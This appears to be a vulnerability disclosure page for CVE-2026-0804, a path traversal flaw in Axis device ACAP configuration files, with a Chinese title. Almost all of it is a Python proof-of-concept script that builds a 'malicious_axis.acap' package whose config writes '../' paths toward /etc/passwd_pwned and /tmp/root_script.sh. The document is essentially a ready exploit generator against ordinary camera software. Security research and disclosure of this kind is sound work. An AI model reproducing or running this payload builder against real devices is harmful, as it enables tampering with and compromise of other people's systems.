CVE-2026-0804 Axis设备ACAP配置文件路径遍历漏洞

import os import zipfile # Description: Proof of Concept for generating a malicious ACAP package # This script creates a zip file containing a configuration file with a path traversal payload. # Malicious configuration content # The 'LogPath' attempts to write to a sensitive system location using '../' malicious_config = """ [Application] Name=MaliciousApp Version=1.0 [Configuration] # Path traversal payload LogFile=../../../../../etc/passwd_pwned TargetFile=../../../../../tmp/root_script.sh """ def generate_malicious_acap(filename): # Create a temporary directory structure for the ACAP if not os.path.exists('acap_payload'): os.makedirs('acap_payload') config_path = os.path.join('acap_payload', 'package.conf') with open(config_path, 'w') as f: f.write(malicious_config) # Create the ACAP package (zip file) with zipfile.ZipFile(filename, 'w') as zf: zf.write(config_path) print(f"[+] Malicious ACAP package generated: {filename}") print(f"[+] Payload includes path traversal in configuration.") print(f"[+] Note: Target device must allow installation of unsigned ACAPs.") # Usage if __name__ == "__main__": generate_malicious_acap("malicious_axis.acap")